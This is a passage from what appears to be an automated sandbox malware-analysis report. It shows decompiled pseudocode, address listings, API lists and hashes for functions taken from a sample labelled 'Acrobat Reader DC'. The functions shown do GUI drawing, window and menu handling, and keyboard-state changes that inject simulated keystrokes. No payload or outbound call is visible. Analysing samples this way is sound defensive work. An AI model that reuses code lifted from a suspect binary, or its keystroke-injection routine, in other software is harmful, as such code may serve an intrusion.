						_t97 = ( *(_v28 + _v12 + 0x810) & 0x000000ff) + 0xfffffff8;
						if(_t97 > 0x10) {
							goto L23;
						}
						switch( *((intOrPtr*)(( *(_t97 + 0x4475bb) & 0x000000ff) * 4 +  &M00447597))) {
							case 0:
								__edi = __edi | 0xffffffff;
								if(_v20 != __edi) {
									__edx = _v16;
									__eax = E0042FD29(__esi, _v16);
								}
								__eax = _v8;
								__eax =  *_v8;
								if(__eax != __edi) {
									_v20 = __eax;
								}
								__eax =  *_a4;
								if(__eax != __edi) {
									_v16 = __eax;
								}
								__edx = _v24;
								_v16 = E0044719B(__esi, _v20, _v16, 0, _v24);
								goto L23;
							case 1:
								__edx = _v16;
								_v12 =  &(_v12->x);
								__eax = 8;
								_a4 =  &(_a4[2]);
								_v8 = _v8 + 8;
								E0042FD29(__esi, _v16) = _v24;
								__edx = _v20;
								E0044719B(__esi, _v20, _v16, 0, _v24) = _a4;
								__edx = _v8;
								__eax =  *_v8;
								_push( *_a4 + __ebx);
								__eax =  *_v8 + __edi;
								_push( *_v8 + __edi);
								goto L22;
							case 2:
								_v12 =  &(_v12->x);
								__eax = 8;
								_a4 =  &(_a4[2]);
								_v8 = _v8 + 8;
								__eax = E0042FD29(__esi, _v16);
								__edx = _v24;
								_v16 = E0044719B(__esi, _v20, _v16, 0, _v24);
								__edx = _a4;
								__eax =  *_a4;
								__edx =  *_v8;
								__eax =  *_a4 + __ebx;
								__edx =  *_v8 + __edi;
								__eax = Ellipse(__esi, __edi, __ebx,  *_v8 + __edi,  *_a4 + __ebx);
								goto L23;
							case 3:
								__eax = MoveToEx(__esi, __edi, __ebx, 0);
								__eax = _v8;
								asm("fild dword [ecx+0x8]");
								__edx =  *(__eax + 8);
								_v12 =  &(_v12->x);
								_v12 =  &(_v12->x);
								_v32 = __fp0;
								asm("fild dword [eax+0x10]");
								__eax = __eax + 0x10;
								__esp = __esp - 8;
								_v68 = __fp0;
								_a4 =  &(_a4[4]);
								__fp0 = _v32;
								_v8 = __eax;
								 *__esp = __fp0;
								AngleArc(__esi, __edi, __ebx, __edx, ??, ??) = LineTo(__esi, __edi, __ebx);
								__eax = CloseFigure(__esi);
								goto L23;
							case 4:
								__eax = _v24;
								_t75 = __eax + 1; // 0xffffffff
								__edx = __ebx + _t75;
								_push(__ebx + _t75);
								__ebx = __ebx - __eax;
								_push(__edi + __eax + 1);
								__edi = __edi - __eax;
								L22:
								__eax = Rectangle(__esi, __edi, __ebx, ??, ??);
								goto L23;
							case 5:
								__eax = SetPixel(__esi, __edi, __ebx, _v20);
								goto L23;
							case 6:
								if(_t112 != 0) {
									_a11 = 1;
								}
								goto L23;
							case 7:
								_v24 = __edi;
								goto L23;
							case 8:
								goto L23;
						}
						L23:
						_t108 = _v28;
						_a4 = _a4 + 8;
						_v8 = _v8 + 8;
						_t99 =  &(_v12->x);
						_v12 = _t99;
					} while (_t99 <  *((intOrPtr*)(_t108 + 0xc)));
					_t100 = _v16;
					_t109 = _t108;
					L25:
					_t110 =  *((intOrPtr*)(_t109 + 4));
					_v28 = _t110;
					if(_t110 != 0) {
						_t109 = _v28;
						continue;
					}
					goto L26;
				}
			}



















                                  0x00447357
                                  0x0044735b
                                  0x0044735e
                                  0x00447363
                                  0x00447367
                                  0x0044736e
                                  0x00447371
                                  0x00447378
                                  0x0044737d
                                  0x00447581
                                  0x00447583
                                  0x00447591
                                  0x00447591
                                  0x00447388
                                  0x00447394
                                  0x0044739b
                                  0x004473a4
                                  0x00000000
                                  0x00000000
                                  0x004473b0
                                  0x004473b3
                                  0x004473b6
                                  0x004473b9
                                  0x004473ce
                                  0x004473d4
                                  0x00000000
                                  0x00000000
                                  0x004473e1
                                  0x00000000
                                  0x00447401
                                  0x00447407
                                  0x00447409
                                  0x0044740e
                                  0x0044740e
                                  0x00447413
                                  0x00447416
                                  0x0044741a
                                  0x0044741c
                                  0x0044741c
                                  0x00447422
                                  0x00447426
                                  0x00447428
                                  0x00447428
                                  0x0044742b
                                  0x0044743a
                                  0x00000000
                                  0x00000000
                                  0x00447444
                                  0x00447447
                                  0x0044744a
                                  0x0044744f
                                  0x00447452
                                  0x0044745c
                                  0x00447462
                                  0x00447470
                                  0x00447475
                                  0x00447478
                                  0x0044747c
                                  0x0044747d
                                  0x0044747f
                                  0x00000000
                                  0x00000000
                                  0x00447488
                                  0x0044748b
                                  0x00447490
                                  0x00447493
                                  0x00447498
                                  0x0044749d
                                  0x004474ac
                                  0x004474b1
                                  0x004474b4
                                  0x004474b9
                                  0x004474bb
                                  0x004474be
                                  0x004474c4
                                  0x00000000
                                  0x00000000
                                  0x004474d4
                                  0x004474dd
                                  0x004474e0
                                  0x004474e3
                                  0x004474e6
                                  0x004474e9
                                  0x004474ec
                                  0x004474ef
                                  0x004474f2
                                  0x004474f5
                                  0x004474fb
                                  0x004474ff
                                  0x00447502
                                  0x00447505
                                  0x00447508
                                  0x00447518
                                  0x0044751f
                                  0x00000000
                                  0x00000000
                                  0x00447536
                                  0x00447539
                                  0x00447539
                                  0x00447541
                                  0x00447542
                                  0x00447544
                                  0x00447545
                                  0x00447547
                                  0x0044754a
                                  0x00000000
                                  0x00000000
                                  0x0044752e
                                  0x00000000
                                  0x00000000
                                  0x004473ea
                                  0x004473f0
                                  0x004473f0
                                  0x00000000
                                  0x00000000
                                  0x004473f9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00447550
                                  0x00447553
                                  0x0044755b
                                  0x0044755e
                                  0x00447561
                                  0x00447562
                                  0x00447565
                                  0x0044756e
                                  0x00447571
                                  0x00447573
                                  0x00447573
                                  0x00447576
                                  0x0044757b
                                  0x00447385
                                  0x00000000
                                  0x00447385
                                  0x00000000
                                  0x0044757b

                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                  • CloseFigure.GDI32(?), ref: 0044751F
                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                  • String ID:
                                  • API String ID: 4082120231-0
                                  • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                  • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                  • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004445F4(intOrPtr _a4, char* _a8) {
				signed int _v99;
				signed int _v100;
				signed int _v169;
				signed int _v242;
				signed int _v243;
				signed int _v244;
				char _v260;
				void* _t53;
				struct HWND__* _t54;
				intOrPtr _t68;
				char* _t102;
				intOrPtr _t103;

				_t103 = _a4;
				_t102 = _a8;
				if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0 ||  *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t102 + 3)) != 0 ||  *((char*)(_t102 + 4)) != 0) {
					_t54 =  *(_t103 + 0x20);
					if(_t54 == 0 || GetParent(_t54) == 0) {
						if( *_t102 != 0) {
							E0043471D(_t103, 0xa0,  *(_t103 + 0x27) & 0x000000ff, 0);
						}
						if( *((char*)(_t102 + 1)) != 0) {
							E0043471D(_t103, 0xa1,  *(_t103 + 0x28) & 0x000000ff, 0);
						}
						if( *((char*)(_t102 + 2)) != 0) {
							E0043471D(_t103, 0x11,  *(_t103 + 0x24) & 0x000000ff, 0);
						}
						if( *((char*)(_t102 + 3)) != 0) {
							E0043471D(_t103, 0x12,  *(_t103 + 0x25) & 0x000000ff, 0);
						}
						if( *((char*)(_t102 + 4)) != 0) {
							E0043471D(_t103, 0x5b,  *(_t103 + 0x29) & 0x000000ff, 0);
						}
						L43:
						return E0043477C(_t103);
					}
					if(GetKeyboardState( &_v260) != 0) {
						if( *_t102 != 0) {
							_v244 = _v244 | 0x00000080;
							_v100 = _v100 | 0x00000080;
						}
						if( *((char*)(_t102 + 1)) != 0) {
							_v244 = _v244 | 0x00000080;
							_v99 = _v99 | 0x00000080;
						}
						if( *((char*)(_t102 + 2)) != 0) {
							_v243 = _v243 | 0x00000080;
						}
						if( *((char*)(_t102 + 3)) != 0) {
							_v242 = _v242 | 0x00000080;
						}
						if( *((char*)(_t102 + 4)) != 0) {
							_v169 = _v169 | 0x00000080;
						}
						SetKeyboardState( &_v260);
					}
					if( *_t102 != 0 ||  *((char*)(_t102 + 1)) != 0) {
						PostMessageW( *(_t103 + 0x20), 0x100, 0x10, ( *(_t103 + 0x26) & 0x000000ff) << 0x00000010 | 0x00000001);
					}
					if( *((char*)(_t102 + 2)) != 0) {
						PostMessageW( *(_t103 + 0x20), 0x100, 0x11, ( *(_t103 + 0x24) & 0x000000ff) << 0x00000010 | 0x00000001);
					}
					_t68 =  *((intOrPtr*)(_t102 + 3));
					if(_t68 != 0) {
						if( *((char*)(_t102 + 2)) != 0 ||  *((char*)(_t103 + 0x1c)) != 0) {
							if(_t68 != 0) {
								PostMessageW( *(_t103 + 0x20), 0x100, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0x00000001);
								goto L30;
							}
						} else {
							PostMessageW( *(_t103 + 0x20), 0x104, 0x12, ( *(_t103 + 0x25) & 0x000000ff) << 0x00000010 | 0x20000001);
							L30:
						}
					}
					if( *((char*)(_t102 + 4)) == 0) {
						goto L43;
					}
					PostMessageW( *(_t103 + 0x20), 0x100, 0x5b, ( *(_t103 + 0x29) & 0x000000ff) << 0x00000010 | 0x00000001);
					return E0043477C(_t103);
				} else {
					return _t53;
				}
			}















                                  0x004445fe
                                  0x00444602
                                  0x00444608
                                  0x00444626
                                  0x0044462c
                                  0x00444766
                                  0x00444775
                                  0x00444775
                                  0x0044477e
                                  0x0044478d
                                  0x0044478d
                                  0x00444796
                                  0x004447a2
                                  0x004447a2
                                  0x004447ab
                                  0x004447b7
                                  0x004447b7
                                  0x004447c0
                                  0x004447cc
                                  0x004447cc
                                  0x004447d1
                                  0x00000000
                                  0x004447d7
                                  0x00444650
                                  0x00444657
                                  0x00444659
                                  0x0044465f
                                  0x0044465f
                                  0x00444666
                                  0x00444668
                                  0x0044466e
                                  0x0044466e
                                  0x00444675
                                  0x00444677
                                  0x00444677
                                  0x00444681
                                  0x00444683
                                  0x00444683
                                  0x0044468d
                                  0x0044468f
                                  0x0044468f
                                  0x0044469c
                                  0x0044469c
                                  0x004446ab
                                  0x004446c9
                                  0x004446c9
                                  0x004446cf
                                  0x004446e7
                                  0x004446e7
                                  0x004446e9
                                  0x004446ee
                                  0x004446f4
                                  0x00444718
                                  0x00444730
                                  0x00000000
                                  0x00444730
                                  0x004446fc
                                  0x00444730
                                  0x00444730
                                  0x00444730
                                  0x004446f4
                                  0x00444736
                                  0x00000000
                                  0x00000000
                                  0x00444752
                                  0x00444760
                                  0x004447dd
                                  0x004447dd
                                  0x004447dd

                                  APIs
                                  • GetParent.USER32(?), ref: 00444633
                                  • GetKeyboardState.USER32(?), ref: 00444648
                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                  • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                  • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                  • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E0044982A(void* __ecx, void* __eflags, signed int _a4, long _a8, long _a12) {
				signed int _v8;
				signed char _t40;
				struct HWND__* _t42;
				long _t49;
				void* _t53;
				struct HWND__** _t58;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t72;
				struct HWND__* _t75;
				signed int _t79;
				long _t80;

				_t79 = _a8;
				_a8 = 0;
				if(E00441AF5(0x4a8630, _a4,  &_v8,  &_a4) != 0) {
					_t63 =  *0x4a8690; // 0x0
					_t64 =  *0x4a86a4; // 0xa51ad0
					_v8 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + _v8 * 4))));
					_t58 =  *( *(_t64 + _a4 * 4));
					_t75 =  *_t58;
					if(_t79 == 0xffffffff) {
						L14:
						_t80 = _a12;
						if(_t80 != 0xffffffff) {
							_t49 = SetWindowLongW(_t75, 0xffffffec, _t80);
							_t72 =  *0x4a86a4; // 0xa51ad0
							_a8 = _t49;
							if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t72 + _a4 * 4)))) + 0x88)) == 0x13) {
								_a8 = SendMessageW(_t75, 0x1036, 0, _t80);
							}
						}
						_t40 = _t58[0x22];
						if(_t40 == 0xff || (_t40 & 0x000000ff) ==  *((intOrPtr*)(_v8 + 0x194))) {
							E00430B87(_v8, _t58, 1);
						} else {
							ShowWindow(_t75, 0);
						}
						_t42 = _t58[0x22];
						if(_t42 == 2 || _t42 == 3 || _t80 != 0xffffffff) {
							SetWindowPos( *_t58, 0, 0, 0, 0, 0, 0x27);
						}
						return 0 | _a8 != 0x00000000;
					} else {
						_t53 = (_t58[0x22] & 0x000000ff) + 0xfffffffe;
						if(_t53 > 0x14) {
							L13:
							_a8 = SetWindowLongW(_t75, 0xfffffff0, _t79 | 0x50000000);
							goto L14;
						} else {
							switch( *((intOrPtr*)(( *(_t53 + 0x4499c6) & 0x000000ff) * 4 +  &M004499AA))) {
								case 0:
									__esi = __esi | 0x00000004;
									goto L9;
								case 1:
									L9:
									_push(0);
									if((__esi & 0x00000800) == 0) {
										__esi = __esi | 0x00010000;
										SendMessageW(__edi, 0xcf, 0, ??);
									} else {
										SendMessageW(__edi, 0xcf, 1, ??);
									}
									goto L13;
								case 2:
									__esi = __esi | 0x0000000e;
									goto L13;
								case 3:
									__esi = __esi | 0x00000003;
									goto L13;
								case 4:
									__esi = __esi | 0x04000000;
									goto L13;
								case 5:
									return 0;
									goto L26;
								case 6:
									goto L13;
							}
						}
					}
				} else {
					return 0;
				}
				L26:
			}















                                  0x00449832
                                  0x00449843
                                  0x00449851
                                  0x0044985f
                                  0x0044986a
                                  0x00449873
                                  0x0044987a
                                  0x0044987d
                                  0x00449882
                                  0x00449902
                                  0x00449902
                                  0x00449908
                                  0x0044990e
                                  0x00449914
                                  0x0044991a
                                  0x0044992c
                                  0x0044993d
                                  0x0044993d
                                  0x0044992c
                                  0x00449940
                                  0x00449948
                                  0x0044996a
                                  0x00449958
                                  0x0044995b
                                  0x0044995b
                                  0x0044996f
                                  0x00449977
                                  0x00449991
                                  0x00449991
                                  0x004499a5
                                  0x00449884
                                  0x0044988b
                                  0x00449891
                                  0x004498ef
                                  0x004498ff
                                  0x00000000
                                  0x00449893
                                  0x0044989a
                                  0x00000000
                                  0x004498b6
                                  0x00000000
                                  0x00000000
                                  0x004498b9
                                  0x004498b9
                                  0x004498c1
                                  0x004498db
                                  0x004498e1
                                  0x004498c3
                                  0x004498cb
                                  0x004498cb
                                  0x00000000
                                  0x00000000
                                  0x004498ac
                                  0x00000000
                                  0x00000000
                                  0x004498b1
                                  0x00000000
                                  0x00000000
                                  0x004498e9
                                  0x00000000
                                  0x00000000
                                  0x004498a9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044989a
                                  0x00449891
                                  0x00449853
                                  0x00449859
                                  0x00449859
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                  • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                  • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                  • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00440D98 Relevance: 10.6, APIs: 7, Instructions: 119windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00440D98(signed int _a4, intOrPtr _a8) {
				intOrPtr _t29;
				long _t31;
				intOrPtr _t32;
				signed int _t34;
				intOrPtr _t36;
				intOrPtr _t41;
				struct HWND__*** _t44;
				struct HWND__*** _t48;
				signed int _t54;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t69;
				signed int _t74;
				signed int _t75;
				void* _t76;
				signed int _t77;
				void* _t86;
				void* _t90;

				_t29 =  *0x4a86a4; // 0xa51ad0
				_t74 = _a4;
				_t77 = _t74;
				_t31 = SendMessageW( *( *( *(_t29 + _t74 * 4))), 0xf0, 0, 0);
				if(_t31 != 0 || _a8 != _t31) {
					if(_t74 < 3) {
						L8:
						_t77 = _t77 + 1;
					} else {
						while(1) {
							_t64 =  *0x4a86a4; // 0xa51ad0
							_t48 =  *(_t64 + _t77 * 4);
							if( *_t48 == 0 || ( *_t48)[0x22] != 0x1a) {
								goto L8;
							}
							if((GetWindowLongW( *( *( *(_t64 + _t77 * 4))), 0xfffffff0) & 0x00020000) == 0) {
								_t77 = _t77 - 1;
								if(_t77 >= 3) {
									continue;
								} else {
									goto L8;
								}
							}
							goto L9;
						}
						goto L8;
					}
					L9:
					_t75 = _t74 + 1;
					_t86 = _t75 -  *0x4a86b4; // 0x2
					if(_t86 <= 0) {
						while(1) {
							_t62 =  *0x4a86a4; // 0xa51ad0
							_t44 =  *(_t62 + _t75 * 4);
							if( *_t44 == 0 || ( *_t44)[0x22] != 0x1a || (GetWindowLongW( *( *( *(_t62 + _t75 * 4))), 0xfffffff0) & 0x00020000) != 0) {
								goto L15;
							}
							_t75 = _t75 + 1;
							_t90 = _t75 -  *0x4a86b4; // 0x2
							if(_t90 <= 0) {
								continue;
							}
							goto L15;
						}
					}
					L15:
					_t76 = _t75 - 1;
					_t54 = _t77;
					if(_t77 <= _t76) {
						do {
							_t41 =  *0x4a86a4; // 0xa51ad0
							SendMessageW( *( *( *(_t41 + _t54 * 4))), 0xf1, 0, 0);
							_t54 = _t54 + 1;
						} while (_t54 <= _t76);
					}
					if(_a8 != 1) {
						_t32 =  *0x4a86a4; // 0xa51ad0
						_t34 = GetWindowLongW( *( *( *(_t32 + _t77 * 4))), 0xfffffff0);
						_t36 =  *0x4a86a4; // 0xa51ad0
						return SetWindowLongW( *( *( *(_t36 + _t77 * 4))), 0xfffffff0, _t34 | 0x00010000);
					}
					_t69 =  *0x4a86a4; // 0xa51ad0
					return SendMessageW( *( *( *(_t69 + _a4 * 4))), 0xf1, 1, 0);
				} else {
					return _t31;
				}
			}





















                                  0x00440d9b
                                  0x00440da2
                                  0x00440db6
                                  0x00440db8
                                  0x00440dc0
                                  0x00440dd1
                                  0x00440e0d
                                  0x00440e0d
                                  0x00440dd3
                                  0x00440dd8
                                  0x00440dd8
                                  0x00440dde
                                  0x00440de4
                                  0x00000000
                                  0x00000000
                                  0x00440e05
                                  0x00440e07
                                  0x00440e0b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00440e0b
                                  0x00000000
                                  0x00440e05
                                  0x00000000
                                  0x00440dd8
                                  0x00440e0e
                                  0x00440e0e
                                  0x00440e0f
                                  0x00440e15
                                  0x00440e18
                                  0x00440e18
                                  0x00440e1e
                                  0x00440e24
                                  0x00000000
                                  0x00000000
                                  0x00440e47
                                  0x00440e48
                                  0x00440e4e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00440e4e
                                  0x00440e18
                                  0x00440e50
                                  0x00440e50
                                  0x00440e51
                                  0x00440e55
                                  0x00440e58
                                  0x00440e58
                                  0x00440e6e
                                  0x00440e74
                                  0x00440e75
                                  0x00440e58
                                  0x00440e7e
                                  0x00440ea6
                                  0x00440eb5
                                  0x00440ec1
                                  0x00000000
                                  0x00440ed0
                                  0x00440e80
                                  0x00440ea3
                                  0x00440ed9
                                  0x00440ed9
                                  0x00440ed9

                                  APIs
                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                  • SendMessageW.USER32(00A51AD0,000000F1,00000000,00000000), ref: 00440E6E
                                  • SendMessageW.USER32(00A51AD0,000000F1,00000001,00000000), ref: 00440E9A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow
                                  • String ID:
                                  • API String ID: 312131281-0
                                  • Opcode ID: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                  • Instruction ID: 2c169baf4234265a3f6c05f50e500cf46f5ce099e15a3d3a23704bf731ec4cbe
                                  • Opcode Fuzzy Hash: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                  • Instruction Fuzzy Hash: 944189342402119FE720CF58DDC4F2A77A1FF9A710F6049A9E2119B3A1CB74ACA2CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00448480(struct HWND__** _a4, signed int _a8, intOrPtr _a12, signed int _a16, short* _a20, int _a24, intOrPtr _a28) {
				struct tagMENUITEMINFOW _v56;
				signed int _t48;
				short* _t51;
				struct HWND__** _t58;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				int _t75;
				int _t76;
				signed int _t77;

				_t58 = _a4;
				_t77 = _a8;
				_t75 = _a16;
				_v56.cbSize = 0x30;
				E00412F40( &(_v56.fMask), 0, 0x2c);
				if(_t75 != 0xffffffff) {
					if(E00441AF5(0x4a8630, _t75,  &_a16,  &_a8) == 0) {
						goto L16;
					} else {
						_t68 =  *0x4a8690; // 0x0
						_t58 =  *( *(_t68 + _a16 * 4));
						if(_t58[0x6a] == 0) {
							goto L16;
						} else {
							_t48 = _a8;
							_t60 =  *0x4a86a4; // 0xa51ad0
							 *(_t77 + 8) =  *( *((intOrPtr*)( *((intOrPtr*)(_t60 + _t48 * 4)))) + 8);
							_t62 =  *0x4a86a4; // 0xa51ad0
							if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t62 + _t48 * 4)))) + 0x88)) != 0xe) {
								L8:
								if(IsMenu( *(_t77 + 8)) == 0) {
									goto L16;
								} else {
									goto L9;
								}
							} else {
								_v56.fMask = 4;
								if(GetMenuItemInfoW( *(_t77 + 8), _t75, 0,  &_v56) == 0) {
									goto L16;
								} else {
									 *(_t77 + 8) = _v56.hSubMenu;
									goto L8;
								}
							}
						}
					}
				} else {
					if(_t58[0x6a] == 0) {
						L16:
						return 0;
					} else {
						 *(_t77 + 8) = _t58[0x68];
						L9:
						_v56.fMask = 0x13;
						_v56.fType = 0;
						if(_a28 == 1) {
							_v56.fType = 0x200;
						}
						_t51 = _a20;
						if( *_t51 == 0) {
							_v56.fType = 0x800;
						} else {
							_v56.dwTypeData = _t51;
						}
						_t76 = _a24;
						_v56.wID = _a12;
						if(InsertMenuItemW( *(_t77 + 8), _t76, 1,  &_v56) == 0) {
							goto L16;
						} else {
							 *(_t77 + 0x80) = _t76;
							DrawMenuBar( *_t58);
							return 1;
						}
					}
				}
			}













                                  0x00448487
                                  0x0044848b
                                  0x0044848f
                                  0x0044849a
                                  0x004484a1
                                  0x004484ac
                                  0x004484de
                                  0x00000000
                                  0x004484e4
                                  0x004484e7
                                  0x004484f0
                                  0x004484f9
                                  0x00000000
                                  0x004484ff
                                  0x004484ff
                                  0x00448502
                                  0x00448510
                                  0x00448513
                                  0x00448525
                                  0x00448549
                                  0x00448555
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00448527
                                  0x00448532
                                  0x00448541
                                  0x00000000
